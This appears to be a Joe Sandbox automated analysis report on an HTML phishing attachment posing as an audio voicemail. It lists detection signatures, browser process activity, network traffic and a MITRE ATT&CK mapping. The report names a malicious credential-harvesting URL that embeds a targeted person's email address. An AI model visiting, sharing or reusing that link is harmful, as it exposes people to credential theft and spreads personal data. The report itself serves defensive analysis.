Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Play_NewMessage_17April2024_Audio.htm

Overview

General Information

Sample name:	Play_NewMessage_17April2024_Audio.htm
Analysis ID:	1428623
MD5:	eb9941dab64b5919987bd0be63185382
SHA1:	990eea5447ba92d0b3d633183776ef0a13c21146
SHA256:	f748db33f47984e17ccf0388ae77704a95d089c9ce8319cab4d3c3255cc47b20

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

HTML file submission requesting Cloudflare captcha challenge

Detected javascript redirector / loader

HTML document with suspicious name

HTML document with suspicious title

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden URLs or javascript code

HTML title does not match URL

Invalid T&C link found

Stores files to the Windows start menu directory

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 2696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Play_NewMessage_17April2024_Audio.htm MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6220 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1012,i,3620797251596088268,17779356394043494701,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Detected javascript redirector / loader

Source: Play_NewMessage_17April2024_Audio.htm

HTTP Parser: Low number of body elements: 1

HTML document with suspicious title

Source: file:///C:/Users/user/Desktop/Play_NewMessage_17April2024_Audio.htm

Tab title: Play_NewMessage_17April2024_Audio.htm

Source: https://p9j0fds.x5kls.com/08711204619506499ReMXXzCfAMMHKGCYNKNMSPXPYJKFMSEXQPPACIIMTKAWCGUKQ?AHOTPUOXSCZUPFQTSQMZGEtJwLKVDPOARASQVVGDZSQAJMJTZQLOCB

HTTP Parser: Number of links: 0

Source: https://p9j0fds.x5kls.com/08711204619506499ReMXXzCfAMMHKGCYNKNMSPXPYJKFMSEXQPPACIIMTKAWCGUKQ?AHOTPUOXSCZUPFQTSQMZGEtJwLKVDPOARASQVVGDZSQAJMJTZQLOCB

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://p9j0fds.x5kls.com/p9j0fds/#felix.felder@dw.com

HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <meta http-equiv="X-UA-Compatible" c...

Source: https://p9j0fds.x5kls.com/08711204619506499ReMXXzCfAMMHKGCYNKNMSPXPYJKFMSEXQPPACIIMTKAWCGUKQ?AHOTPUOXSCZUPFQTSQMZGEtJwLKVDPOARASQVVGDZSQAJMJTZQLOCB

HTTP Parser: Title: YyJGYNfjVh does not match URL

Source: https://p9j0fds.x5kls.com/08711204619506499ReMXXzCfAMMHKGCYNKNMSPXPYJKFMSEXQPPACIIMTKAWCGUKQ?AHOTPUOXSCZUPFQTSQMZGEtJwLKVDPOARASQVVGDZSQAJMJTZQLOCB	HTTP Parser: Invalid link: Terms of use
Source: https://p9j0fds.x5kls.com/08711204619506499ReMXXzCfAMMHKGCYNKNMSPXPYJKFMSEXQPPACIIMTKAWCGUKQ?AHOTPUOXSCZUPFQTSQMZGEtJwLKVDPOARASQVVGDZSQAJMJTZQLOCB	HTTP Parser: Invalid link: Privacy & cookies

Source: https://p9j0fds.x5kls.com/08711204619506499ReMXXzCfAMMHKGCYNKNMSPXPYJKFMSEXQPPACIIMTKAWCGUKQ?AHOTPUOXSCZUPFQTSQMZGEtJwLKVDPOARASQVVGDZSQAJMJTZQLOCB

HTTP Parser: <input type="password" .../> found

Source: Play_NewMessage_17April2024_Audio.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_NewMessage_17April2024_Audio.htm	HTTP Parser: No favicon
Source: https://p9j0fds.x5kls.com/p9j0fds/#felix.felder@dw.com	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ur7ir/0x4AAAAAAAXU4aRETj8TpaQY/auto/normal	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ur7ir/0x4AAAAAAAXU4aRETj8TpaQY/auto/normal	HTTP Parser: No favicon
Source: https://p9j0fds.x5kls.com/08711204619506499ReMXXzCfAMMHKGCYNKNMSPXPYJKFMSEXQPPACIIMTKAWCGUKQ?AHOTPUOXSCZUPFQTSQMZGEtJwLKVDPOARASQVVGDZSQAJMJTZQLOCB	HTTP Parser: No favicon

Source: https://p9j0fds.x5kls.com/08711204619506499ReMXXzCfAMMHKGCYNKNMSPXPYJKFMSEXQPPACIIMTKAWCGUKQ?AHOTPUOXSCZUPFQTSQMZGEtJwLKVDPOARASQVVGDZSQAJMJTZQLOCB

HTTP Parser: No <meta name="author".. found

Source: https://p9j0fds.x5kls.com/08711204619506499ReMXXzCfAMMHKGCYNKNMSPXPYJKFMSEXQPPACIIMTKAWCGUKQ?AHOTPUOXSCZUPFQTSQMZGEtJwLKVDPOARASQVVGDZSQAJMJTZQLOCB

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.216.73.151:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.216.73.151:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.9.254:443 -> 192.168.2.16:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.113.196.254:443 -> 192.168.2.16:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.74.236.255:443 -> 192.168.2.16:49784 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 23.216.73.151
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108

Source: unknown

DNS traffic detected: queries for: p9j0fds.x5kls.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 23.216.73.151:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.216.73.151:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.9.254:443 -> 192.168.2.16:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.113.196.254:443 -> 192.168.2.16:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.74.236.255:443 -> 192.168.2.16:49784 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: Play_NewMessage_17April2024_Audio.htm

Initial sample: play

Source: classification engine

Classification label: mal60.phis.evad.winHTM@18/35@18/156

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Play_NewMessage_17April2024_Audio.htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1012,i,3620797251596088268,17779356394043494701,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1012,i,3620797251596088268,17779356394043494701,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Data Obfuscation

HTML file submission requesting Cloudflare captcha challenge

Source: https://p9j0fds.x5kls.com/p9j0fds/#felix.felder@dw.com

HTTP Parser: https://p9j0fds.x5kls.com/p9j0fds/#felix.felder@dw.com

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Play_NewMessage_17April2024_Audio.htm	0%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false		high
code.jquery.com	151.101.194.137	true	false		high
d2vgu95hoyrpkh.cloudfront.net	108.156.152.88	true	false		high
p9j0fds.x5kls.com	104.21.65.219	true	true		unknown
challenges.cloudflare.com	104.17.3.184	true	false		high
www.google.com	74.125.136.106	true	false		high
cdn.socket.io	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
file:///C:/Users/user/Desktop/Play_NewMessage_17April2024_Audio.htm	true		low
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ur7ir/0x4AAAAAAAXU4aRETj8TpaQY/auto/normal	false		high
about:blank	false		low
https://p9j0fds.x5kls.com/p9j0fds/#felix.felder@dw.com	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.253.124.100	unknown	United States		15169	GOOGLEUS	false
108.156.152.88	d2vgu95hoyrpkh.cloudfront.net	United States		16509	AMAZON-02US	false
74.125.136.94	unknown	United States		15169	GOOGLEUS	false
1.1.1.1	unknown	Australia		13335	CLOUDFLARENETUS	false
74.125.136.84	unknown	United States		15169	GOOGLEUS	false
104.21.65.219	p9j0fds.x5kls.com	United States		13335	CLOUDFLARENETUS	true
74.125.136.106	www.google.com	United States		15169	GOOGLEUS	false
142.250.105.105	unknown	United States		15169	GOOGLEUS	false
104.17.3.184	challenges.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
64.233.185.100	unknown	United States		15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
142.251.15.94	unknown	United States		15169	GOOGLEUS	false
142.250.9.94	unknown	United States		15169	GOOGLEUS	false
151.101.194.137	code.jquery.com	United States		54113	FASTLYUS	false
35.190.80.1	a.nel.cloudflare.com	United States		15169	GOOGLEUS	false
